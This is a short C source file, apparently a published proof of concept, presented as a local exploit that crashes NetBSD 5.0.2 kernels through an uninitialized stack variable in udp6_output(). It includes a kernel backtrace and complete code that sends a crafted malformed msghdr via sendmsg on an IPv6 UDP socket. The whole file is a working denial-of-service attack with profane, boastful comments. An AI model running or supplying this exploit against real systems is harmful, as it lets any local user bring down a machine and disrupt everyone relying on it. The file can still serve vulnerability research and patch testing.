/**
 * udp6owage.c - udp6_output() uninitialized stack local kernel panic exploit
 *
 * Tested against NetBSD 5.0.2
 *
 * foo:~ % ./udp6ownage
 * (...)
 * #9  0xc010cbe0 in calltrap ()
 * #10 0xc0466be6 in malloc (size=1122380, ksp=0xc0a7efe0, flags=-1) at ../../../../kern/kern_malloc.c:375
 * #11 0xc019a039 in ip6_clearpktopts (pktopt=0xc712ba68, optname=-1) at ../../../../netinet6/ip6_output.c:2306
 * #12 0xc01a8bda in udp6_output (in6p=0xc10a6f34, m=0xc0ee1e00, addr6=0xc0ee1d00, control=0xc0ee1f00, l=0xc71155a0) at ../../../../netinet6/udp6_output.c:198
 * #13 0xc01a9dc8 in udp6_usrreq (so=0x4, req=9, m=0xc0ee1e00, addr6=0xc0ee1d00, control=0xc0ee1f00, l=0xc71155a0) at ../../../../netinet6/udp6_usrreq.c:330
 * #14 0xc0191c61 in udp6_usrreq_wrapper (a=0xc0efab40, b=9, c=0xc0ee1e00, d=0xc0ee1d00, e=0xc0ee1f00, f=0xc71155a0) at ../../../../netinet6/in6_proto.c:152
 * (...)
 *
 * (c) Copyright 2o1o - Clement LECIGNE
 */
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/uio.h>
#include <sys/socket.h>
#include <sys/types.h>

int main(int ac, char **av)
{
    char            name[] = "EV1LN4M3", control[] = "MOUH4H4H4H4H4H4";
    int             s;
    struct msghdr   msg;

    s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
    if (s < 0)
        perror("socket"), exit(1337);

    /* setup our evil msghdr
     */
    msg.msg_name        = name;             /* a fucked addr6 in udp6_output() */
    msg.msg_namelen     = sizeof(name);
    msg.msg_iov         = NULL;
    msg.msg_iovlen      = 0;
    msg.msg_flags       = -1;
    msg.msg_control     = control;
    msg.msg_controllen  = sizeof(control);

    /* sbam? sbing? sbong? :-)
     */
    sendmsg(s, &msg, 0);

    close(s);
    fprintf(stderr, "sploit fucked\n");
}